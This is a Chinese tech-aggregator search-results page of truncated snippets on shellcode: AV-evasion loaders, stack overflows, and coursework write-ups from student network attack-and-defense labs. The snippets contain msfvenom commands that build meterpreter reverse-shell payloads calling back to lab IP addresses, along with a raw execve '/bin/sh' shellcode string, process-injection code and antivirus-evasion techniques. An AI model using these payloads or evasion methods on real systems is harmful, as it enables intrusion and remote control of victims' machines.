ICode9

精准搜索请尝试: 精确搜索
  • payload分离免杀2020-01-08 17:04:22

    shellcode loader 借助第三方加载器,将shellcode加载到内存中来执行。 https://github.com/clinicallyinane/shellcode_launcher msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=172.16.1.130 lport=4444 -e x86/shikata_ga_nai -i 5 -f raw > test.c 靶机执行 shellcode

  • 驱动实现强制重启与关机操作2019-10-22 12:01:03

    强制重启计算机。在内核里直接使用 OUT 指令就能强制重启计算机而不可能被任何钩子拦截。此代码可以用在反调试里。 VOID ForceReboot() { typedef void (__fastcall *FCRB)(void); /* mov al, 0FEh out 64h, al ret */ FCRB fcrb=NULL; UCHAR shellcode[6]="\xB0\xFE\xE6\x64\xC3

  • linux – ARM,GNU汇编程序:如何将“数组”参数传递给execve()?2019-08-29 21:51:00

    我正在编写一个简单的shellcode,它会调用execve()用于ARM平台(Raspberry PI上的Linux),并且遇到第二个参数execve.按照documentation: int execve(const char *filename, char *const argv[], char *const envp[]); 如果我调用execve(“/ bin / sh”,{NULL},{NULL}),那对我来说完

  • 编写并提取通用 ShellCode2019-08-27 13:38:08

    ShellCode 通常是指一个原始的可执行代码的有效载荷,ShellCode 这个名字来源于攻击者通常会使用这段代码来获得被攻陷系统上的交互 Shell 的访问权限,而现在通常用于描述一段自包含的独立的可执行代码片段。 上节课的简易 ShellCode 虽然可以正常被执行,但是还存在很多的问题,因为上次

  • 编写简易 ShellCode2019-08-26 13:55:21

    ShellCode 通常是指一个原始的可执行代码的有效载荷,ShellCode 这个名字来源于攻击者通常会使用这段代码来获得被攻陷系统上的交互 Shell 的访问权限,而现在通常用于描述一段自包含的独立的可执行代码片段。 ShellCode 通常会与漏洞利用并肩使用,或是被恶意代码用于执行进程代码的注

  • 入门栈溢出(1)2019-08-14 10:40:48

    1,shellcode (修改返回地址,让其指向溢出数据中的一段指令) 其实就是用攻击指令的起始地址覆盖返回地址,就可以得到shell payload:padding1+ address of shellcode +paddiing2 + shellcode padding1:可以任意填充(不要输入 “\x00",否则程序传入溢出数据会造成截断)长度刚

  • 从头到脚了解缓冲溢出2019-08-07 18:02:20

    原文链接:http://www.cnblogs.com/F4ncy/archive/2005/09/19/239958.html 从头到脚了解缓冲溢出 作者:Wendy 在这份指南中,我们将讨论什么是缓冲溢出和怎么样去使用它。你必须了解C语言和汇编语言,如果熟悉GDB的话更加好,当然这不是很必要的。 (Memory organ

  • linux – 如何检查给定shellcode执行的命令?2019-07-23 04:01:35

    可以说我给了以下shellcode: char shellcode[]= "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68" "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89" "\xe1\xcd\x80"; 如

  • [源码]Python免杀ShellCode加载器(Cobaltstrike/Metasploit)2019-07-21 23:51:33

    0x001 原理 采用分离法,即将ShellCode和加载器分离。方法较LOW但免杀。 本文主要将ShellCode转成HEX,再通过加载器执行ShellCode。 PS: 何为SC加载器,即专门用于加载所提供ShellCode的工具。 如同HTTP发包工具,支持提交HTTP,写死参数最多只能叫EXP。 再详细点,打个比方,你只会炒一个菜,你敢

  • execle()也指定了环境.那是什么意思?2019-06-29 14:38:10

    我正在读一本名为“黑客:剥削艺术”的书,我看到了这一段: With execl(), the existing environment is used, but if you use execle(), the entire environment can be specified. If the environment array is just the shellcode as the first string (with a NULL pointer t

  • 在python中评估shellcode的方法?2019-06-26 19:44:09

    使用C程序评估shellcode样本并不复杂.它将涉及将shellcode存储在字符数组中,创建函数指针,对指针进行类型转换并使其指向数组并调用函数(指针). 这是它的工作原理,假设你可以在nastycode []执行内存: /* left harmless. Insert your own working example at your peril */ char nas

  • 20165212 任胤 《网络对抗》免考项目——恶意代码、恶意程序绑定2019-06-24 22:42:05

    恶意代码、恶意程序绑定实践 1 Shellcode的生成与分析 1.1 shellcode概念和获取手段 Shellcode是16进制的机器码,我的所有实验中shellcode来源于两个地方:一是kali中用msfvenom -p linux/meterpreter/shellreversetcp -b '\x00\x0a' LHOST=192.168.235.137 LPORT=5212 -f c 这种命

  • 学号20189220 2018-2019-2 《密码与安全新技术专题》第六周作业2019-05-30 14:54:28

    学号20189220 2018-2019-2 《密码与安全新技术专题》第六周作业 课程:《密码与安全新技术专题》 班级: 1892 姓名: 余超 学号:20189220 上课教师:张健毅 上课日期:2019年2月26日 必修/选修: 选修 1.本次讲座的学习总结 本次讲座主要学习了什么是漏洞挖掘、常见漏洞挖掘技术、漏洞挖掘示例

  • mysql UDF提权 sys_bineval2019-05-22 19:54:57

    介绍: 执行shellcode – sys_bineval sqmapl自带udf.dll中存在函数’sys_bineval,执行shellcode – sys_bineval 利用: MSF生成shellcode: msfvenom -p windows/meterpreter/reverse_http EXITFUNC=thread LPORT=8080 LHOST=172.16.229.139 -a x86 -e x86/alpha_mixed -f raw BufferR

  • Linux shellcode sample2019-04-30 17:38:08

    Linux shellcode sample   HelloWorld.nasm ;HelloWorld.asm;Author: Kul Subediglobal _startsection .text _start: ; print HelloWorld! in screen mov eax, 0x4 mov ebx, 0x1 mov ecx, message ;mov edx, 12 mov edx, mlen

  • 2018-2019-2 20165212《网络攻防技术》Exp5 MSF基础应用2019-04-19 23:00:21

    2018-2019-2 20165212《网络攻防技术》Exp5 MSF基础应用 攻击成果 主动攻击的实践 ms17010eternalblue payload windows/x64/meterpreter/reverse_tcp(成功) payload generic/shellreversetcp(成功) ms17010psexec(成功且唯一) 攻击浏览器的实践 ms14064olecodeexecution payload w

  • windows平台上用python 远程线程注入,执行shellcode2019-04-08 15:54:48

    // 转自: https://blog.csdn.net/Jailman/article/details/77573990import sysimport psutil import ctypes from ctypes import * PAGE_EXECUTE_READWRITE = 0x00000040 PROCESS_ALL_ACCESS = ( 0x000F0000 | 0x00100000 | 0xFFF ) VIRTUAL_MEM =

  • 2018-2019-2 20165209 《网络对抗技术》Exp3:免杀原理与实践2019-03-31 21:39:36

    2018-2019-2 20165209 《网络对抗技术》Exp3:免杀原理与实践 1 免杀原理与实验内容 1.1 免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。 哪里有后门呢? 编译器留后门 操作系统留后门 最常见的当然还是应用程序中留后门 还有就是潜伏于

  • Exp3 免杀原理与实践 20164321 王君陶2019-03-31 18:50:09

    Exp3 免杀原理与实践 20164321 王君陶 1实验要求 1.1 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcode编程(1分) 1.2 通过组合应用各种技术实现恶意代码免杀(0.5分) (如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软

  • 2018-2019-2 网络对抗技术 20165219 Exp3 免杀原理与实践2019-03-31 17:52:43

    2018-2019-2 网络对抗技术 20165219 Exp3 免杀原理与实践 实验任务 1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧;(1.5分) 2 通过组合应用各种技术实现恶意代码免杀(1分) (如果成功实现了免杀的,简单语言描述原理,不要截图。

  • NF_Exp3_201643062019-03-31 17:37:35

    免杀原理与实践 1 关键内容  正确使用msf编码器,msfvenom 生成如 jar 之类的其他文件,veil-evasion,加壳工具,使用 shellcode 编程  通过组合应用各种技术实现恶意代码免杀  用另一电脑实测,在杀软开启的情况下,可运行并回连成功 2 基础问题回答 杀软是如何检测出恶意代码的? 构建病毒

  • 20165120马鹏云 Exp1+ 逆向进阶=v=2019-03-24 12:41:52

    建议的实践内容包括:  Task1 (5-10分)   自己编写一个64位shellcode。参考shellcode指导。   自己编写一个有漏洞的64位C程序,功能类似我们实验1中的样例pwn1。使用自己编写的shellcode进行注入。  Task 2 (5-10分)   进一步学习并做ret2lib及rop的实践,以绕过“堆栈执行保护”。参

  • 2018-2019-2 《网络对抗技术》Exp1 PC平台逆向破解 Week2 201651152019-03-17 11:50:43

    EXP1 PC平台逆向破解 20165115 张承昱 一 实践目标 1、实验背景 本次实践的对象是一个名为pwn1的linux可执行文件。该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。该程序同时包含另一个代码片getShell,会返回一个可用Shell。正常情况下这个代码是不

  • 20164318 毛瀚逸 Exp1 PC平台逆向破解2019-03-16 13:39:01

    一、逆向及Bof基础实践说明 1.1实践目标 本次实践的对象是一个名为pwn1的linux可执行文件。 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。 利用foo函数的Bof漏洞,构造一个攻击输入字

  • 2018-2019-2 20165316 《网络对抗技术》Exp1 PC平台逆向破解2019-03-15 23:43:51

    2018-2019-2 20165316 《网络对抗技术》Exp1 PC平台逆向破解 1 逆向及Bof基础实践说明 1.1 实践目标 本次实践的对象是一个名为pwn1的linux可执行文件。 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。 该程序同时包含另一个代码片段,getShell,会返

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有